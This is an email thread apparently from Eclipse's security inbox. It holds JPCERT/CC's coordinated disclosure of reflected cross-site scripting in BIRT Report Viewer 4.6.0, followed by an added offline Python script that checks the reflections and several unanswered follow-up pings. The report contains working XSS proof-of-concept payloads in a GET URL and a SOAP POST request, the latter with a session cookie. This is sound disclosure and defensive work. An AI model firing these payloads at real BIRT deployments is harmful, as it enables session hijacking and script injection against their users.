From the security@eclipse.org inbox:

Dear Eclipse Security Team,

Hello. This is Hirozumi Nihonmatsu from JPCERT/CC.

Attached to this email is the original report and the details of the reported vulnerability. The zip file is password-protected, and the password will be sent in a separate email.

- BIRT vulnerable to cross-site scripting

Please read through the report and return to us with information such as:
- validation of the products, and whether the reported vulnerability is confirmed or not
- solutions (e.g., patch or module update)
- workarounds, if any
- estimated time for creation of fixes
- preferable date for public release on your site

* We will also publish an advisory for this issue on our vulnerability knowledge base, JVN (http://jvn.jp, http://jvn.jp/en/), synchronizing with your release schedule.

**Caution**
We have assigned a Vulnerability ID (VN) and a tracking number (TN) to this vulnerability issue:
VN: JVN#53394617 / TN: JPCERT#95206031
Please be sure to include these numbers in the subject line for future communication with us.

We appreciate your cooperation on this. If you have any questions or concerns, please do not hesitate to contact us at any time.

Thank you in advance for your attention to this matter. We are looking forward to hearing from you.

Sincerely yours,
Hirozumi Nihonmatsu
JPCERT/CC Vulnerability Handling Team
==================================================================
JPCERT Coordination Center (JPCERT/CC)
TEL: +81-3-3518-4600 FAX: +81-3-3518-4602
EMAIL: vuls@jpcert.or.jp
PGP key: 0xE46138B5: E9EA 6B5F 7C3B F3D6 5539 F758 4E9D 7E92 E461 38B5
https://www.jpcert.or.jp/english/
-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (begins here)
-----------------------------------------------------------------

[Title and VUL ID]
- JVN#53394617 - BIRT vulnerable to cross-site scripting

[Original finder/reporter's information]
- Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.

[Affected product and version]
- BIRT Report Viewer ver.4.6.0
  http://www.eclipse.org/birt/
  https://projects.eclipse.org/projects/birt

[Reproduction Procedure]

<Scenario 1>
Open the malicious link below in the browser; the payload is sent in GET parameters.

http://<Hostname>/birt-viewer/run?__report=report%2FR_S05.rptdesign&__masterpage=true&__format=html&__parameterpage=false&PROJECT_ID=2&TICKET_ID=1xxx&__islocale=TICKET_IDxxx&TARGET_DATE_FROM=2011%2F04%2F01&__islocale=TARGET_DATE_FROM&TARGET_DATE_TO=2011%2F12%2F25&__islocale=TARGET_DATE_TO&INDEX=0&__islocale=INDEX&HELP_FLAG=true"><script>alert(7)</script>xxx&__islocale=HELP_FLAG&NEW_WINDOW_FLAG=false"><script>alert(6)</script>xxx&__islocale=NEW_WINDOW_FLAG&BIND_OFFSET=10"><script>alert(5)</script>xxx&__islocale=BIND_OFFSET&LIMMIT=10"><script>alert(4)</script>xxx&__islocale=LIMMIT&DRILL_FLAG=true"><script>alert(3)</script>xxxxx&__islocale=DRILL_FLAGxxxxx&DRILL_FIRST_FLAG=true"><script>alert(2)</script>xxxx&__islocale=DRILL_FIRST_FLAG&NAVI_CREATE_FLAG=NAVI_CREATE_FLAG"><script>alert(1)</script>xxxxxx&__islocale=NAVI_CREATE_FLAG

<Scenario 2>
POST /birt-viewer/frameset?__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html&__islocale=NAVI_CREATE_FLAG&__id=birtViewerR_M02&__sessionId=20170403_102433_278 HTTP/1.1
Host: 192.168.153.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Referer: http://192.168.153.132/birt-viewer/frameset?__id=birtViewerR_M02&__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.4.0
Content-Type: application/x-www-form-urlencoded, text/xml; charset=UTF-8
SOAPAction: ""
request-type: SOAP
Content-Length: 1350
Cookie: JSESSIONID=78E16375AA18933FBEB220A740EB64B6; _redmine_session=BAh7DToVaW1wb3J0ZXJfd3JhcHBlciIGIiIVZmlsZXNfaW5kZXhfc29ydCINZmlsZW5hbWU6DHVzZXJfaWRpBjoPc2Vzc2lvbl9pZCIlOTBiZDUyODhjZmJhNDRjNTUzODkwNTI0YjQ1MDc3MGM6EF9jc3JmX3Rva2VuIjFSMkJDWVJtRUpUYU1JTm5LcWN3TVZqdDBINmpac0I5T244MjdjdWdCWDhNPToWaW1wb3J0ZXJfZW5jb2RpbmciBlU6FWltcG9ydGVyX3RtcGZpbGUiNS90bXAvcmVkbWluZV9pbXBvcnRlcl9pcGZzYW1wbGVwcm9qZWN0X2FkbWluLmNzdjoWaW1wb3J0ZXJfc3BsaXR0ZXIiBiw%3D--9b9d1429e54db160dfa79ce9ec1f158865afc50d
Connection: close

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>ChangeParameter</Operator><Oprand><Name>CONDITION</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__CONDITION</Name><Value>?????°?????????</Value></Oprand><Oprand><Name>__islocale</Name><Value>THRESHOLD</Value></Oprand><Oprand><Name>THRESHOLD</Name><Value><svg onload=alert()></Value></Oprand><Oprand><Name>__isdisplay__THRESHOLD</Name><Value><svg onload=alert()></Value></Oprand><Oprand><Name>USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>__isdisplay__LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>__isdisplay__BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__svg</Name><Value>false</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value>2017-3-3-10-25-31-70</Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>

[Proof-of-Concept Code]
Written in the "Reproduction Procedure" section above.

[CVSSv2 and v3 Scores]
-----------------------------------------------------------------
CVSSv2
-----------------------------------------------------------------
AV:N/AC:M/Au:N/C:N/I:P/A:N/BS:4.3
-----------------------------------------------------------------
CVSSv3
-----------------------------------------------------------------
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/BS:6.1
-----------------------------------------------------------------

-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (ends here)
-----------------------------------------------------------------
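The report exercises two reflection contexts: in Scenario 1 a GET parameter is echoed into a double-quoted HTML attribute (which is why every payload opens with `">`), and in Scenario 2 a SOAP <Value> is echoed as page text (its payload is a bare `<svg onload=alert()>` element). The script below is an added example written for this page, not code from the report or from the BIRT project. It pulls the injected parameters out of the Scenario 1 URL, renders them through an assumed attribute sink and an assumed text sink (the `<input type="hidden">` and `<span>` templates are a model of where the viewer echoes values, not the viewer's own markup), and parses the result the way a browser would to see whether the payload became markup. The host `birt.example` stands in for the report's `<Hostname>` placeholder; no requests are sent, so it runs offline.

```python
"""Reflection check for the BIRT viewer XSS report above (added example,
not BIRT project code). The attribute and text sinks are an assumed model
of the viewer's echo points; no network traffic is generated."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Scenario 1 PoC URL quoted from the report; birt.example replaces <Hostname>.
POC_URL = (
    'http://birt.example/birt-viewer/run?__report=report%2FR_S05.rptdesign'
    '&__masterpage=true&__format=html&__parameterpage=false&PROJECT_ID=2'
    '&TICKET_ID=1xxx&__islocale=TICKET_IDxxx'
    '&TARGET_DATE_FROM=2011%2F04%2F01&__islocale=TARGET_DATE_FROM'
    '&TARGET_DATE_TO=2011%2F12%2F25&__islocale=TARGET_DATE_TO'
    '&INDEX=0&__islocale=INDEX'
    '&HELP_FLAG=true"><script>alert(7)</script>xxx&__islocale=HELP_FLAG'
    '&NEW_WINDOW_FLAG=false"><script>alert(6)</script>xxx&__islocale=NEW_WINDOW_FLAG'
    '&BIND_OFFSET=10"><script>alert(5)</script>xxx&__islocale=BIND_OFFSET'
    '&LIMMIT=10"><script>alert(4)</script>xxx&__islocale=LIMMIT'
    '&DRILL_FLAG=true"><script>alert(3)</script>xxxxx&__islocale=DRILL_FLAGxxxxx'
    '&DRILL_FIRST_FLAG=true"><script>alert(2)</script>xxxx&__islocale=DRILL_FIRST_FLAG'
    '&NAVI_CREATE_FLAG=NAVI_CREATE_FLAG"><script>alert(1)</script>xxxxxx&__islocale=NAVI_CREATE_FLAG'
)

# Scenario 2 payload quoted from the SOAP body (THRESHOLD / __isdisplay__THRESHOLD).
SOAP_PAYLOAD = "<svg onload=alert()>"

# Tags the report's payloads try to introduce.
MARKUP = re.compile(r"<(?:script|svg)\b", re.I)


def injected_params(url):
    """Return {name: value} for every query parameter whose value carries a payload."""
    query = urlsplit(url).query
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True) if MARKUP.search(v)}


# --- assumed sinks: the raw echo and its output-encoded counterpart ---

def attr_sink(name, value, encode):
    """Attribute context (Scenario 1). quote=True also encodes " and ', so the
    value can no longer terminate the attribute it is placed in."""
    if encode:
        name, value = html.escape(name, quote=True), html.escape(value, quote=True)
    return f'<input type="hidden" name="{name}" value="{value}">'


def text_sink(value, encode):
    """Element-content context (Scenario 2); < > & are enough for a text node."""
    if encode:
        value = html.escape(value, quote=False)
    return f"<span>{value}</span>"


class _Collector(HTMLParser):
    """Records every start tag and attribute name the parser produces."""

    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(k for k, _ in attrs)


def injected_markup(fragment, expected_tags):
    """Parse the fragment like a browser and return (unexpected tags,
    event-handler attributes). Either list being non-empty means the
    reflected value changed the document structure."""
    p = _Collector()
    p.feed(fragment)
    p.close()
    tags = [t for t in p.tags if t not in expected_tags]
    handlers = [a for a in p.attrs if a.lower().startswith("on")]
    return tags, handlers


def audit(params, encode):
    """Render each Scenario 1 parameter through the attribute sink and the
    Scenario 2 payload through the text sink; return the sorted names whose
    payload still produced executable markup."""
    hits = []
    for name, value in params.items():
        tags, handlers = injected_markup(attr_sink(name, value, encode), {"input"})
        if tags or handlers:
            hits.append(name)
    tags, handlers = injected_markup(text_sink(SOAP_PAYLOAD, encode), {"span"})
    if tags or handlers:
        hits.append("THRESHOLD")
    return sorted(hits)


if __name__ == "__main__":
    params = injected_params(POC_URL)
    print("payloads found in PoC URL:", sorted(params))
    print("still injected with raw echo:", audit(params, encode=False))
    print("still injected with output encoding:", audit(params, encode=True))
```

Run it directly: with `encode=False` all seven Scenario 1 parameters and the Scenario 2 THRESHOLD value produce a `<script>` or `<svg onload>` node; with `encode=True` none do. The encoding has to match the sink's context: entity-encoding only `<` and `>` would still let a value containing `"` close the attribute it sits in, which is exactly what the `">` prefix in the report's payloads relies on.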
Has anyone had time to look at this?
Hello? Does anybody intend to look at this?
ping?
Project team, there's help regarding how we handle vulnerability reports in the handbook. https://www.eclipse.org/projects/handbook/#vulnerability